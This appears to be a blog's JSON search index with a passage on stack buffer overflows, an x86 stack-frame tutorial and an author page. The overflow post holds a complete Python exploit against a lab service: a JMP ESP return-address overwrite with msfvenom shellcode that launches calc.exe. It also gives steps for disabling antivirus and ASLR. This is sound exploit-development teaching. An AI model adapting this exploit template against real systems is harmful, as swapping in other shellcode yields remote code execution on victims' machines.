gets reconstructed at runtime in memory.\nThe Decoder Problem and the Fix shikata_ga_nai uses ESP as scratch space while it is decoding. It pushes and pops temporary values relative to ESP as part of the XOR loop. After JMP ESP fires, ESP points at the very first byte of the shellcode. 
The decoder starts running and its scratch writes land on top of the encoded bytes it has not decoded yet. The shellcode corrupts itself before it finishes unpacking and crashes.\nThe fix is to create distance between ESP and the start of the shellcode before the decoder begins running.\nOption 1: NOP sled. Prepend 0x90 bytes before the shellcode. Each NOP is a single byte instruction that does nothing except advance EIP by one. ESP does not move. After sliding through 16 NOPs, EIP is pointing at the shellcode but ESP is still 16 bytes behind, sitting in the sled. When the decoder runs and writes scratch values relative to ESP, those writes land in the NOP sled area, which has already been executed and does not matter.\npayload = b\u0026#34;A\u0026#34; * 68 + jmp_esp + b\u0026#34;\\x90\u0026#34; * 16 + buf Option 2: sub esp prefix. Prepend sub esp, 0x10 before the shellcode. This is the opcode \\x83\\xec\\x10. It is a single 3-byte instruction that subtracts 16 from ESP, moving it 16 bytes below the shellcode. The decoder then has clean scratch space that does not overlap with the encoded payload at all.\npayload = b\u0026#34;A\u0026#34; * 68 + jmp_esp + b\u0026#34;\\x83\\xec\\x10\u0026#34; + buf Both approaches solve the same problem. 
The sub esp version costs 3 bytes instead of 16, which is worth knowing when buffer space is tight.\nThe Full Exploit import socket import struct import sys TARGET_IP = \u0026#34;192.168.122.85\u0026#34; TARGET_PORT = 4444 def exploit(): print(f\u0026#34;[*] Target : {TARGET_IP}:{TARGET_PORT}\u0026#34;) print(f\u0026#34;[*] Gadget : JMP ESP @ 0x75d099fd (msvcrt.dll)\u0026#34;) print(f\u0026#34;[*] Bad chars : \\\\x00\u0026#34;) print(f\u0026#34;[*] Encoder : x86/shikata_ga_nai\u0026#34;) jmp_esp = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x75d099fd) # msfvenom -p windows/exec CMD=calc.exe -b \u0026#34;\\x00\u0026#34; -f python buf = b\u0026#34;\u0026#34; buf += b\u0026#34;\\xda\\xcf\\xbf\\xb9\\x47\\xc3\\xec\\xd9\\x74\\x24\\xf4\\x58\u0026#34; buf += b\u0026#34;\\x33\\xc9\\xb1\\x31\\x31\\x78\\x18\\x03\\x78\\x18\\x83\\xe8\u0026#34; buf += b\u0026#34;\\x45\\xa5\\x36\\x10\\x5d\\xa8\\xb9\\xe9\\x9d\\xcd\\x30\\x0c\u0026#34; buf += b\u0026#34;\\xac\\xcd\\x27\\x44\\x9e\\xfd\\x2c\\x08\\x12\\x75\\x60\\xb9\u0026#34; buf += b\u0026#34;\\xa1\\xfb\\xad\\xce\\x02\\xb1\\x8b\\xe1\\x93\\xea\\xe8\\x60\u0026#34; buf += b\u0026#34;\\x17\\xf1\\x3c\\x43\\x26\\x3a\\x31\\x82\\x6f\\x27\\xb8\\xd6\u0026#34; buf += b\u0026#34;\\x38\\x23\\x6f\\xc7\\x4d\\x79\\xac\\x6c\\x1d\\x6f\\xb4\\x91\u0026#34; buf += b\u0026#34;\\xd5\\x8e\\x95\\x07\\x6e\\xc9\\x35\\xa9\\xa3\\x61\\x7c\\xb1\u0026#34; buf += b\u0026#34;\\xa0\\x4c\\x36\\x4a\\x12\\x3a\\xc9\\x9a\\x6b\\xc3\\x66\\xe3\u0026#34; buf += b\u0026#34;\\x44\\x36\\x76\\x23\\x62\\xa9\\x0d\\x5d\\x91\\x54\\x16\\x9a\u0026#34; buf += b\u0026#34;\\xe8\\x82\\x93\\x39\\x4a\\x40\\x03\\xe6\\x6b\\x85\\xd2\\x6d\u0026#34; buf += b\u0026#34;\\x67\\x62\\x90\\x2a\\x6b\\x75\\x75\\x41\\x97\\xfe\\x78\\x86\u0026#34; buf += b\u0026#34;\\x1e\\x44\\x5f\\x02\\x7b\\x1e\\xfe\\x13\\x21\\xf1\\xff\\x44\u0026#34; buf += b\u0026#34;\\x8a\\xae\\xa5\\x0f\\x26\\xba\\xd7\\x4d\\x2c\\x3d\\x65\\xe8\u0026#34; buf += 
b\u0026#34;\\x02\\x3d\\x75\\xf3\\x32\\x56\\x44\\x78\\xdd\\x21\\x59\\xab\u0026#34; buf += b\u0026#34;\\x9a\\xe3\\xc2\\xcb\\xb4\\x93\\xac\\x61\\xf9\\xf9\\x4e\\x5c\u0026#34; buf += b\u0026#34;\\x3d\\x04\\xcd\\x55\\xbd\\xf3\\xcd\\x1f\\xb8\\xb8\\x49\\xf3\u0026#34; buf += b\u0026#34;\\xb0\\xd1\\x3f\\xf3\\x67\\xd1\\x15\\x90\\xe6\\x41\\xf5\\x79\u0026#34; buf += b\u0026#34;\\x8d\\xe1\\x9c\\x85\u0026#34; sub_esp = b\u0026#34;\\x83\\xec\\x10\u0026#34; # sub esp, 0x10 payload = b\u0026#34;A\u0026#34; * 68 # fill buf[64] + overwrite saved EBP payload += jmp_esp # overwrite return address with JMP ESP gadget payload += sub_esp # move ESP away before decoder runs payload += buf # shikata_ga_nai encoded shellcode print(f\u0026#34;[*] Payload : {len(payload)} bytes\u0026#34;) print(f\u0026#34;[*] Layout : [A x68] [JMP ESP] [sub esp,10] [shellcode x{len(buf)}]\u0026#34;) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) print(f\u0026#34;[+] Connected\u0026#34;) s.send(payload) print(f\u0026#34;[+] Payload sent\u0026#34;) s.close() print(f\u0026#34;[+] Done. Check target for calc.exe\u0026#34;) except ConnectionRefusedError: print(f\u0026#34;[-] Connection refused. Is the service running?\u0026#34;) sys.exit(1) except Exception as e: print(f\u0026#34;[-] Error: {e}\u0026#34;) sys.exit(1) if __name__ == \u0026#34;__main__\u0026#34;: exploit() Payload Layout Offset 0-67 : A x 68 fills buf[64], overwrites saved EBP Offset 68-71 : fd 99 d0 75 JMP ESP address in little-endian Offset 72-74 : 83 ec 10 sub esp, 0x10 (3 bytes) Offset 75+ : shellcode 220 bytes, shikata_ga_nai encoded Total : 295 bytes Execution Chain Here is exactly what happens from the moment the payload lands:\nThe service receives 295 bytes into input via recv(). vulnerable(input) gets called. The prologue sets up the stack frame. strcpy(buf, input) copies the payload into buf. 
It fills 64 bytes into the buffer, overwrites saved EBP with 0x41414141, and overwrites the return address with 0x75d099fd. printf runs and prints the garbled output. No crash yet because only stack data was corrupted, not any executing code. The epilogue runs. mov esp, ebp collapses the local frame. pop ebp loads 0x41414141 into EBP. ret pops 0x75d099fd into EIP. The CPU jumps to 0x75d099fd inside msvcrt.dll. The instruction at that address is JMP ESP. JMP ESP jumps to whatever ESP currently holds. ESP is pointing at offset 72, which is \\x83\\xec\\x10. sub esp, 0x10 executes. ESP moves 16 bytes downward, away from the shellcode. The shikata_ga_nai decoder stub runs. Its scratch writes relative to ESP land 16 bytes below the shellcode. No corruption. The decoder finishes unpacking and jumps into the decoded shellcode. The shellcode resolves Windows API addresses and calls WinExec(\u0026quot;calc.exe\u0026quot;, 0). calc.exe opens on the target. WinDbg Stack Dump at Execution Stack contents captured right as the shellcode was executing, showing the sub esp prefix at 011ff63c (the ninth byte of the row starting at 011ff634) and the fully decoded shellcode in memory, including the tail of the calc.exe string in ASCII (lc.exe) at 011ff714:\n011ff634 00 00 00 00 00 00 ff ff-83 ec 10 d9 ec ba 67 d7 011ff644 2f 5e d9 74 24 f4 5f 29-c9 b1 31 31 57 18 83 c7 011ff654 04 03 57 14 e2 f5 fc e8-82 00 00 00 60 89 e5 31 011ff664 c0 64 8b 50 30 8b 52 0c-8b 52 14 8b 72 28 0f b7 011ff674 4a 26 31 ff ac 3c 61 7c-02 2c 20 c1 cf 0d 01 c7 011ff714 6c 63 2e 65 78 65 00 01-00 0c bb 21 02 c0 b7 5d Key Takeaways ret is just pop eip. Control what sits at ESP when ret executes and you control the CPU. That one primitive is what every stack overflow is built on.\nKnowing the stack layout cold matters more than any tool. Offset to EIP, what sits between the buffer and the return address, which direction the overflow travels. These need to be automatic before touching an exploit.\nEvery byte in the payload has a job. Filler, gadget address, decoder protection, shellcode. 
One wrong byte causes a crash with no obvious indication of where it went wrong. Build and verify each piece separately before assembling the full payload.\nBad character enumeration is not optional. A single corrupted byte mid-shellcode produces a failure that looks identical to any other crash. Do the enumeration before generating shellcode, every time.\nThe debugger tells the truth. dd esp, db esp, r eip, u eip. When something crashes, the answer is in the register dump and the stack contents. Not in the source code, not in intuition.\nThis exploit runs against a deliberately vulnerable lab binary compiled without modern mitigations. It is a learning exercise.\n","permalink":"https://4w4647.github.io/posts/stack-buffer-overflows-eip-control-to-code-execution/","summary":"\u003ch2 id=\"lab-setup\"\u003eLab Setup\u003c/h2\u003e\n\u003cp\u003eThree things need to be sorted on the Windows lab machine before any of this works cleanly.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eAntivirus off.\u003c/strong\u003e Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eASLR disabled system-wide.\u003c/strong\u003e Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. 
This registry key forces that:\u003c/p\u003e","title":"Stack Buffer Overflows - EIP Control to Code Execution"},{"content":"Where Everything Starts Before you write a single byte of shellcode, before you talk about ROP chains or DEP bypasses, there is one mental model you need to have locked in cold. The stack frame.\nEvery stack-based exploit ever written comes down to the same thing: you overflow a buffer, you overwrite a return address, and when the function returns, the CPU jumps somewhere you control. That\u0026rsquo;s it. The techniques that come later are just clever ways of working around defenses layered on top of that same primitive.\nSo let\u0026rsquo;s build the model from scratch, at the instruction level, with no hand-waving.\nThe x86 Stack The stack is a region of memory that grows downward. Higher addresses are at the top conceptually, but as you push things onto the stack, the stack pointer moves toward lower addresses.\nTwo registers manage it:\nESP (Stack Pointer) always points to the top of the stack, which is the lowest address currently in use EBP (Base Pointer) anchors the current function\u0026rsquo;s frame so locals and arguments can be accessed at fixed offsets Every push subtracts 4 from ESP and writes a value there. Every pop reads from ESP and adds 4. That is the whole mechanism. Before the Function: The Caller\u0026rsquo;s Job Take this C code:\nvoid foo(int a, int b) { char buf[16]; int x; } foo(1, 2); Before foo starts executing, the caller has to get the arguments onto the stack. In the cdecl calling convention (the default for most x86 C code), arguments are pushed right to left. Last argument first, first argument last.\npush 2 ; push b first (last argument) push 1 ; push a second (first argument) call foo ; now jump into foo Why right to left? Because after the push sequence, the first argument ends up closest to the top of the stack. 
Once the frame is set up, a will be at [ebp+8] and b will be at [ebp+12], consistently, regardless of how many arguments there are. This is why printf can take a variable number of arguments and still find the first one reliably.\nWhat does CALL actually do?\nCALL is not magic. It is equivalent to two instructions:\npush eip ; push the address of the instruction after CALL jmp foo ; jump to foo The address it pushes is called the return address. It is where execution will resume after foo finishes. Without it, the program would have no idea where to go back to.\nAt this point, just before foo starts, the stack looks like this:\nHigh Address ┌─────────────────┐ │ 2 │ argument b ├─────────────────┤ │ 1 │ argument a ├─────────────────┤ │ return address │ pushed by CALL, ESP points here └─────────────────┘ Low Address Inside the Function: The Prologue The moment execution lands inside foo, the first three instructions you will almost always see are the prologue:\npush ebp ; save the caller\u0026#39;s base pointer onto the stack mov ebp, esp ; point EBP at the current top of stack sub esp, 20 ; carve out 20 bytes for local variables Walk through each one:\npush ebp saves the caller\u0026rsquo;s EBP so it can be restored later. Every function does this so the chain of stack frames stays intact.\nmov ebp, esp sets EBP to the current value of ESP. From this point forward, EBP is fixed for the duration of the function. It does not move. This gives you a stable anchor to reference locals and arguments by offset.\nsub esp, 20 moves ESP down by 20 bytes, reserving space for buf[16] and int x (4 bytes). The compiler calculates the total size of all locals at compile time and emits a single sub esp to reserve all of it at once. 
You will never see one sub per variable.\nAfter the prologue, the stack looks like this:\nHigh Address ┌─────────────────┐ │ 2 │ [ebp+12] argument b ├─────────────────┤ │ 1 │ [ebp+8] argument a ├─────────────────┤ │ return address │ [ebp+4] ├─────────────────┤ │ saved EBP │ [ebp] EBP points here ├─────────────────┤ │ buf[16] │ [ebp-16] to [ebp-1] ├─────────────────┤ │ int x │ [ebp-20] ESP points here └─────────────────┘ Low Address Notice a few things:\nArguments live above EBP at positive offsets. Locals live below EBP at negative offsets. This is why you will constantly see things like [ebp+8] for the first argument and [ebp-4] for the first local in disassembly. That is not a coincidence. It is the direct result of the prologue.\nAlso notice that locals declared first end up at higher addresses (closer to saved EBP). Locals declared later end up at lower addresses. The stack grows downward, so as space gets reserved, it goes down. This ordering matters when you calculate overflow offsets.\nLeaving the Function: The Epilogue When foo is done, it needs to tear down the frame and return. This is the epilogue:\nmov esp, ebp ; point ESP back at saved EBP, discarding all locals pop ebp ; restore caller\u0026#39;s EBP, ESP now points at return address ret ; pop return address into EIP, jump there Walk through each one:\nmov esp, ebp collapses the local variable space in one shot. ESP jumps back up to where EBP is pointing, which is saved EBP. All the locals are now gone as far as the stack is concerned.\npop ebp reads the saved EBP value off the stack into the EBP register, restoring the caller\u0026rsquo;s frame. ESP moves up by 4, now pointing at the return address.\nret is the most important instruction in exploit development. It is equivalent to:\npop eip ; read whatever ESP points to, put it in EIP, add 4 to ESP The CPU takes the return address off the stack and jumps there. 
Execution resumes in the caller right after the original call foo.\nAfter ret, the stack is back to what it looked like before the call.\nA Note on Pointer Arguments One thing that catches beginners out. When a function takes a pointer argument like char *str, the caller does not push the string onto the stack. It pushes a 4-byte address pointing to where the string lives in memory.\nvoid bar(char *name, int age) { ... } bar(\u0026#34;alice\u0026#34;, 25); push 25 ; int age (4 bytes) push \u0026lt;addr of \u0026#34;alice\u0026#34;\u0026gt; ; char* name (4-byte pointer, not the string itself) call bar The string \u0026quot;alice\u0026quot; itself sits somewhere in the data segment. What goes on the stack is a pointer to it. Always 4 bytes on x86, regardless of how long the string is.\nLittle-Endian Memory One more thing you need burned in before you write any exploit code.\nx86 is little-endian. Multi-byte values are stored in memory with the least significant byte at the lowest address.\nSo the address 0x42658ade in memory looks like:\nAddress: 0x00 0x01 0x02 0x03 Value: de 8a 65 42 When you build a Python payload and need to put an address in your buffer, you have to account for this:\nimport struct struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x42658ade) # produces: b\u0026#39;\\xde\\x8a\\x65\\x42\u0026#39; The \u0026lt;I means little-endian unsigned 32-bit integer. Get this backwards and your exploit crashes every time at ret because EIP gets loaded with the wrong address. This is one of the most common reasons a first exploit attempt fails.\nThe Exploit Primitive Here is where it all connects.\nbuf[16] lives near the bottom of the stack frame. If a function copies user-controlled data into buf without checking the length, that data writes upward in memory. 
It fills the buffer first, then keeps going.\nStarting from the first byte of buf:\nBytes 1-16 fill buf[16] Bytes 17-20 overwrite saved EBP Bytes 21-24 overwrite the return address Offset to EIP = 20 bytes\nWhen the function returns and ret executes, it pops whatever is at ESP into EIP. You put your own address at offset 20 (bytes 21-24 of the input). The CPU jumps there. You own execution.\nThat is the primitive. That is what every stack overflow in this course is built on.\nCalculating the Offset: The Formula offset to EIP = size of buf + size of locals at HIGHER addresses than buf + 4 bytes for saved EBP The tricky part is the second term. Locals at higher addresses than buf sit between buf and saved EBP. You have to overflow through them to reach saved EBP and then the return address.\nLocals at lower addresses than buf are irrelevant. The overflow travels upward, away from them.\nExample:\nvoid vuln(char *input, int len) { char buf[64]; int check; } Stack after prologue:\nHigh Address ┌─────────────────┐ │ len │ argument ├─────────────────┤ │ input ptr │ argument (4-byte pointer) ├─────────────────┤ │ return address │ [ebp+4] ├─────────────────┤ │ saved EBP │ [ebp] ├─────────────────┤ │ buf[64] │ ├─────────────────┤ │ check │ ESP points here └─────────────────┘ Low Address check is below buf. Overflow never touches it. saved EBP is directly above buf.\nOffset to EIP = 64 + 4 = 68 bytes.\nWinDbg: Reading the Stack Live Once you are in a debugger staring at a crash, these are the commands you run immediately:\ndd ebp read saved EBP (tells you if the frame is corrupted) dd ebp+4 read the return address (tells you what EIP will become) dd esp read the top of the stack k show the full call stack r dump all registers If you see a pattern like 41414141 at [ebp+4], that means you\u0026rsquo;ve overwritten the return address with AAAA and you now know your overflow is reaching EIP. 
From there it is a matter of finding the exact offset and replacing those bytes with something useful.\nQuick Reference Instruction What It Does push ebp Save caller\u0026rsquo;s frame pointer onto the stack mov ebp, esp Anchor EBP to current stack top sub esp, N Reserve N bytes for local variables mov esp, ebp Collapse locals, ESP jumps back to saved EBP pop ebp Restore caller\u0026rsquo;s EBP, ESP moves to return address ret Pop return address into EIP, jump there Key Takeaways The stack grows downward. Push moves ESP toward lower addresses. Arguments are pushed right to left by the caller before CALL. CALL = push return address + jump to function. The prologue sets up the frame in three instructions. The epilogue tears it down in three instructions. EBP is fixed for the life of the function. Arguments are at positive offsets from EBP. Locals are at negative offsets. ret = pop EIP. If you control what is at ESP when ret executes, you control where the CPU goes next. Overflow travels upward in memory. Locals below the buffer are never reached. x86 is little-endian. Addresses in payloads must be packed bytes-reversed. Offset to EIP = size of buf + locals above buf + 4 (saved EBP). ","permalink":"https://4w4647.github.io/posts/stack-frames-the-foundation-of-every-stack-overflow/","summary":"\u003ch2 id=\"where-everything-starts\"\u003eWhere Everything Starts\u003c/h2\u003e\n\u003cp\u003eBefore you write a single byte of shellcode, before you talk about ROP chains or DEP bypasses, there is one mental model you need to have locked in cold. The stack frame.\u003c/p\u003e\n\u003cp\u003eEvery stack-based exploit ever written comes down to the same thing: you overflow a buffer, you overwrite a return address, and when the function returns, the CPU jumps somewhere you control. That\u0026rsquo;s it. 
The techniques that come later are just clever ways of working around defenses layered on top of that same primitive.\u003c/p\u003e","title":"Stack Frames - The Foundation of Every Stack Overflow"},{"content":"Security researcher into exploit development, reverse engineering, and vulnerability research. Background in C/C++, x86/x64 assembly, Windows internals, and malware analysis. Currently preparing for OSED.\nSkills C / C++ x86 / x64 Assembly Windows Internals Reverse Engineering Vulnerability Research Binary Exploitation Malware Analysis Offensive Security Research Python Security Tooling\nFind Me GitHub: github.com/4w4647 LinkedIn: linkedin.com/in/4w4647 X: x.com/4w4647 ","permalink":"https://4w4647.github.io/about/","summary":"\u003cp\u003eSecurity researcher into \u003cstrong\u003eexploit development\u003c/strong\u003e, \u003cstrong\u003ereverse engineering\u003c/strong\u003e, and \u003cstrong\u003evulnerability research\u003c/strong\u003e. Background in C/C++, x86/x64 assembly, Windows internals, and malware analysis. 
Currently preparing for OSED.\u003c/p\u003e\n\u003ch2 id=\"skills\"\u003eSkills\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eC / C++\u003c/code\u003e \u003ccode\u003ex86 / x64 Assembly\u003c/code\u003e \u003ccode\u003eWindows Internals\u003c/code\u003e \u003ccode\u003eReverse Engineering\u003c/code\u003e\n\u003ccode\u003eVulnerability Research\u003c/code\u003e \u003ccode\u003eBinary Exploitation\u003c/code\u003e \u003ccode\u003eMalware Analysis\u003c/code\u003e\n\u003ccode\u003eOffensive Security Research\u003c/code\u003e \u003ccode\u003ePython Security Tooling\u003c/code\u003e\u003c/p\u003e\n\u003ch2 id=\"find-me\"\u003eFind Me\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGitHub: \u003ca href=\"https://github.com/4w4647/\"\u003egithub.com/4w4647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinkedIn: \u003ca href=\"https://linkedin.com/in/4w4647\"\u003elinkedin.com/in/4w4647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eX: \u003ca href=\"https://x.com/4w4647\"\u003ex.com/4w4647\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"Awagat Dhungana (4w4647)"}]